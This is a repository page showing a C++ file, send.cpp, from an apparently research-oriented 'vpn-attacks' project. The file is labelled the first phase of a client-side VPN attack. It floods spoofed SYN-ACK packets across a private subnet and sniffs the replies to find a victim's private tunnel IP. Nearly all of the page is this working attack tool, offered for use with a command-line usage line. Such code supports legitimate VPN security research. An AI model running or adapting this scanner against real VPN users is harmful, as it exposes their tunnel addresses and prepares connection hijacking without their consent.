Breakpointing-Bad-Public
/
vpn-attacks
7
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
33 Commits
1 Branch
0 Tags
530 MiB
Tree: 0a4e3bb714
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '0a4e3bb714'
${ noResults }
vpn-attacks/client-side-attack/first_phase/send.cpp

173 lines
4.3 KiB
Raw Normal View History

adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
added client side attack env to virtual lab and server side tcp
3 years ago
adding original attack test scripts and demos
3 years ago
  1. #include <iostream>
  2. #include <iomanip>
  3. #include <vector>
  4. #include <set>
  5. #include <string>
  6. #include <cstdlib>
  7. #include <pthread.h>
  8. #include <unistd.h>
  9. #include <tins/tins.h>
  10. #include <tins/ip.h>
  11. #include <tins/tcp.h>
  12. #include <tins/ip_address.h>
  13. #include <tins/ethernetII.h>
  14. #include <tins/network_interface.h>
  15. #include <tins/sniffer.h>
  16. #include <tins/utils.h>
  17. #include <tins/packet_sender.h>
  19. using std::cout;
  20. using std::endl;
  21. using std::vector;
  22. using std::pair;
  23. using std::setw;
  24. using std::string;
  25. using std::set;
  26. using std::runtime_error;
  28. using namespace Tins;
  30. typedef pair<Sniffer*, string> sniffer_data;
  32. std::string vip;
  33. std::string gwip;
  35. bool verbose = false;
  38. class Scanner {
  39. public:
  40. Scanner(NetworkInterface& interface,
  41. std::string dest_mac,
  42. std::string source_mac,
  43. std::string gateway_ip,
  44. std::string private_ip,
  45. std::string private_ip_subnet_mask,
  46. int sport,
  47. int dport);
  49. void run();
  50. private:
  51. void send_synacks();
  52. bool callback(PDU& pdu);
  53. static void* thread_proc(void* param);
  54. void launch_sniffer();
  55. NetworkInterface iface;
  56. std::string dst_mac;
  57. std::string src_mac;
  58. std::string src_ip;
  59. std::string victim_ip;
  60. std::string victim_subnet;
  61. int sport;
  62. int dport;
  63. Sniffer sniffer;
  64. };
  66. Scanner::Scanner(NetworkInterface& interface,
  67. std::string dest_mac,
  68. std::string source_mac,
  69. std::string gateway_ip,
  70. std::string private_ip,
  71. std::string private_ip_subnet_mask,
  72. int src_port,
  73. int dst_port) : iface(interface), dst_mac(dest_mac), src_mac(source_mac), src_ip(gateway_ip), victim_ip(private_ip), victim_subnet(private_ip_subnet_mask), sport(src_port), dport(dst_port),sniffer(interface.name()) {
  75. }
  77. void* Scanner::thread_proc(void* param) {
  78. Scanner* data = (Scanner*)param;
  79. data->launch_sniffer();
  80. return 0;
  81. }
  83. void Scanner::launch_sniffer() {
  84. sniffer.sniff_loop(make_sniffer_handler(this, &Scanner::callback));
  85. }
  88. // Handle sniffed packets until we find a response
  89. // with a potential private tun IP address
  90. //
  91. bool Scanner::callback(PDU& pdu) {
  92. // Find the layers we want.
  93. const IP &ip = pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
  94. const TCP &tcp = pdu.rfind_pdu<TCP>(); // Grab TCP layer
  95. static int total_seen = 0;
  96. if (ip.src_addr().to_string().rfind("10.", 0) == 0 && tcp.sport() != 22) {
  97. if (verbose) std::cout << "Victim IP is:";
  98. std::cout << ip.src_addr() << "\n";
  99. vip = ip.src_addr();
  100. total_seen += 1;
  101. if (total_seen > 0) {
  102. return false;
  104. }
  105. }
  106. return true;
  107. }
  109. void Scanner::run() {
  110. pthread_t thread;
  111. // Launch our sniff thread.
  112. pthread_create(&thread, 0, &Scanner::thread_proc, this);
  113. // Start sending SYNs to possible private IPs
  114. send_synacks();
  116. // Wait for our sniffer.
  117. void* dummy;
  118. pthread_join(thread, &dummy);
  119. }
  121. // Send syn acks to the given ip address, using the destination ports provided.
  122. void Scanner::send_synacks() {
  123. // Retrieve the addresses.
  124. PacketSender sender;
  125. IPv4Range ip_range = IPv4Range::from_mask(victim_ip, victim_subnet);
  128. for (const IPv4Address &addr : ip_range) {
  129. EthernetII pkt = EthernetII(dst_mac, src_mac) / IP(addr, src_ip) / TCP(dport, sport);
  130. TCP& tcp = pkt.rfind_pdu<TCP>();
  131. tcp.set_flag(TCP::ACK, 1);
  132. tcp.set_flag(TCP::SYN, 1);
  133. if (verbose) std::cout << "Sending to IP:" << addr << std::endl;
  134. sender.send(pkt, iface);
  135. sender.send(pkt, iface);
  136. usleep(10);
  137. }
  139. }
  141. void scan(int argc, char* argv[]) {
  142. std::string dst_mac = argv[1]; // victim MAC address
  143. std::string src_mac = ""; // src mac does not matter
  144. std::string private_ip_subnet = argv[2];
  145. std::string private_ip_subnet_mask = argv[3];
  146. gwip = argv[4]; // IP of server that client is talking to
  148. int sport = 80; // source, dest port for phase-1 are arbitrary
  149. int dport = 80;
  152. IPv4Address ip(gwip);
  153. // Resolve the interface which will be our gateway
  154. NetworkInterface iface(ip);
  155. if (verbose) cout << "Sniffing on interface: " << iface.name() << endl;
  156. // Consume arguments
  157. Scanner scanner(iface, dst_mac, src_mac, gwip, private_ip_subnet,
  158. private_ip_subnet_mask, sport, dport);
  159. scanner.run();
  160. }
  162. int main(int argc, char* argv[]) {
  163. if (argc != 6) {
  164. std::cout << "usage: ./send <DST_MAC> <PRIVATE IP SUBNET> <PRIVATE IP SUBNET MASK> <SOUCE IP> <IFACE>\n";
  165. exit(-1);
  166. }
  167. try {
  168. scan(argc, argv);
  169. }
  170. catch(runtime_error& ex) {
  171. cout << "Error - " << ex.what() << endl;
  172. }
  173. }